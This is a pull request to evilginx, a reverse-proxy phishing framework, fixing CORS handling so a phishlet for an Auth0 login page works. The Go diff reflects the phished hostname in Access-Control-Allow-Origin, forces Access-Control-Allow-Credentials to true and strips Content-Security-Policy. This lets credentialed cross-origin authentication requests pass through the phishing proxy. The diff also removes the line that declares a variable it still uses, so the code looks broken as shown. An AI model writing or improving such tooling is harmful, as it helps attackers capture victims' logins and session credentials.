### PR TITLE
Access-Control headers fix

### DIFF
--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -421,10 +421,17 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 				}
 			}
 
-			allow_origin := resp.Header.Get("Access-Control-Allow-Origin")
-			if allow_origin != "" {
+			if (allow_origin != "") {
+				u, _ := url.Parse(allow_origin)
+				if r_host, ok := p.replaceHostWithPhished(u.Host); ok {
+					resp.Header.Set("Access-Control-Allow-Origin", u.Scheme + "://" + r_host)
+					resp.Header.Set("Access-Control-Allow-Credentials", "true")
+				}
+			} else {
 				resp.Header.Set("Access-Control-Allow-Origin", "*")
+				resp.Header.Set("Access-Control-Allow-Credentials", "true")
 			}
+			
 			resp.Header.Del("Content-Security-Policy")
 
 			redirect_set := false


### PR DESCRIPTION
I am developing a phishlet for an Auth0 login page which performs some cross-origin requests to authenticate. These requests were failing in my browser because the XHR which initiated the request did so with the withCredentials property. This means the browser will block a request unless there is an Access-Control-Allow-Credentials header included in the response. Although this header is in included in evilginx's responses, for security reasons the browser discards the reply when combined with the Access-Control-Allow-Origin: * header. 

This PR simply reflects the the origin's hostname in the ACAO header, which browsers will accept when the ACAC header is also present. I don't think this will break anything. 